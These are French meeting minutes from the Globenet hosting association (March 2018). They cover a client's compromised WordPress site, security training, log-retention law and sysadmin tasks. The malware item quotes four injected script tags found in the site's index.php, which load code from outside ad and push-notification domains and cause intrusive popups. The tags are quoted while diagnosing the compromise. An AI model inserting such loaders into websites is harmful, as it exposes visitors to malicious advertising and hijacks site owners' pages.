2018-03 Mardi Globenet mars 2018

, par WhilelM

Mardi Globenet du 13 mars 2018

présent-es

  • Aube
  • Emile
  • Jacques
  • Jon
  • Sebian
  • Taffit
  • WhilelM

ODJ

  • malware site web ?
  • formation échanges et partenariats
  • retour OLN
  • Adminsys
    • certificats à renouveller
    • webmail squirrelmail - porter la taille des pièces jointes à 5Mo
    • Accès OOB (Out-Of-Band) Gitoyen ?
    • DNS primaire dns.sudeducation.org

malware site web ?

Un hébergé nous a contacté suite à des messages de visiteurs qui se plaignent de popups publicitaires agressifs lors de la visite de son site web. Ces pages n’apparaissent pas pour toutes les visites.

Après discussion et analyse en réunion, on a bien la confirmation que le site web est compromis.

Quoi faire : mettre à jour - il y a de fortes chances que ça ne suffise pas.
il faudrait faire le ménage mais ça semble être une grosse tache.

Par exemple ligne 804 de la page wp/index.php :

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>
<script src="//go.mobtrks.com/notice.php?p=1537586&interstitial=1"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1567903" data-cfasync="false" async></script>

Ce sont des référence à des bouts de codes qui vont récupérer de la pub.

Au niveau du serveur, le répertoire wordpress est une inclusion dans un répertoire SPIP qui est aussi actif (sans savoir si ce SPIP est aussi vérolé).

formation échanges et partenariats

L’association échanges et partenariats nous a contacté pour demander une intervention sur la sécurité numérique auprès de bénévoles qui partiront en mission. Le périmètre de l’intervention est en discussion et devrait se faire le 12 avril 2018.

retour OLN

Dans les locaux de la quadrature, discussion de stratégies communes sur la question des libertés sur Internet.

Questions sur les durées de rétention des logs

Une fiche juridique est en cours d’élaboration par la quadrature et la FFDN sur le cadre juridique lié à l’hébergement, notamment la rétention des données de journalisation (logs).

L’idée est lancée de participer à un événement autour de la mise en place du RGPD le 25 mai 2018.

La Quadrature a déjà diffusé un guide juridique à l’attention des structures qui donnent un libre accès à Internet.

On retiendra du document que :

  • La loi française sanctionne le non-respect de l’obligation de rétention d’identifiant de terminal, d’identifiant de attribué (tel qu’une adresse ip), des dates heures de début etde fin d’accès ainsi que les caractéristiques de la ligne. Cette sanction peut aller jusqu’à une peine d’un an d’emprisonnement et une amende de 375 000 €

mais que cependant :

  • conserver des données personnelles sans justification est puni en droit européen d’une amende de 20 000 000 € ou 4% du chiffre d’affaire mondial.

et conclue qu’il est recommandé aux organisations d’appliquer le droit européen.

Problématique des nouvelles boîtes noires de l’ANSSI

Il semble clair que l’ANSSI veut faire du DPI. La quadrature a un point de vue, la FFDN n’en a pas pour l’instant.

Lire Du deep packet inspection dans le projet de loi de programmation militaire 2019-2025

Adminsys

certificats à renouveler

Jacques s’occupe de la mise en place des certif no-log
Jon, WhilelM et Emile pour Globenet.

webmail squirrelmail - porter la taille des pièces jointes à 5Mo

consensus pour monter à 5Mo
intérêt pour argumenter les raisons de ne pas monter la taille des pièces.

Accès OOB (Out-Of-Band) Gitoyen ?

Il faut encore demander à Ielo-Liazo s’il est possible d’avoir un câble en cuivre entre la baie de Globenet et celle où est Gitoyen. L’autre solution d’utiliser un lien fibre est vraiment à éviter (on ne veut pas brancher le serveur de consoles sur un switch ou un convertisseur de média).

DNS primaire dns.sudeducation.org

Bougé vers la nouvelle infrastructure, la configuration du secondaire
(karl.globenet.org) a été mise à jour en coordination.